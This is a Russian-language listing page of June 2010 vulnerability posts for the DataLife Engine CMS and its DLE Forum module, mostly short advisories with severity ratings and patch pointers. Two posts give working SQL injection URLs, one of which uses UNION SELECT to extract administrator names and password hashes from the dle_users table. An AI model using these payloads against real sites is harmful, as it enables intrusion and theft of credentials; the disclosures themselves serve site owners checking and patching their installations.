Баги » Всё для DLE, Datalife Engine, ДЛЕ. Шаблоны, Модули, Хаки, Скины

	Очередная инъекция в DLE Forum	Баги
Очередная инъекция в DLE Forum Описание: sql-инъекция Зависимость: register_globals = on Файл: engine/forum/sources/showtopic.php Кусок кода: if (intval($tid)) $row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid"); Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]

Рейтинг:

-2

Просмотров: 893 Добавил: stuk 23 июня 2010 Комментариев (7) Подробнее

	SQL – инъекция в DLE-Forum 2.4	Баги
SQL – инъекция в DLE-Forum 2.4 В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях. У кого стоит данная версия форума, рекомендуется проверить на уязвимость: ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,

Рейтинг:

+17

Просмотров: 1862 Добавил: stuk 11 июня 2010 Комментариев (20) Подробнее

	Баг - получаем список доп. полей	Баги
Баг - получаем список доп. полей Данный баг позволяет просто скачать список доп. полей новостей и юзеров DLE уязвимость работает на версиях: ВСЕ DLE Уровень риска: Низкая Нашёл очередной баг: Lion__

Рейтинг:

Просмотров: 1306 Добавил: Lion__ 9 июня 2010 Комментариев (22) Подробнее

	Баг - прямой вызов файлов и мусор в папках	Баги
Баг - прямой вызов файлов и мусор в папках Данный баг позволяет производить прямой запуск файлов и мусорить в папках DLE уязвимость работает на версиях: ВСЕ DLE Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора) Нашёл очередной баг: Lion__

Рейтинг:

Просмотров: 1095 Добавил: Lion__ 9 июня 2010 Комментарий (21) Подробнее

	Недостаточная фильтрация входящих данных	Баги
Недостаточная фильтрация входящих данных Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта. Ошибка в версии: Все версии Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте) Как исправить в полной новости...

Рейтинг:

Просмотров: 1731 Добавил: DEN 007 8 июня 2010 Комментариев (36) Подробнее

	Проведение атаки межсайтового скриптинга (XSS)	Баги
Проведение атаки межсайтового скриптинга (XSS) Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера. Ошибка в версии: 7.x - 8.5 Степень опасности: Низкая Для исправления скачайте и скопируйте на свой сервер патч: dle7_85_path.zip [3.17 Kb] (cкачиваний: 235) Данный патч применим ко всем версиям: 7.x - 8.5

Рейтинг:

+11

Просмотров: 1282 Добавил: neoks 3 июня 2010 Комментариев (22) Подробнее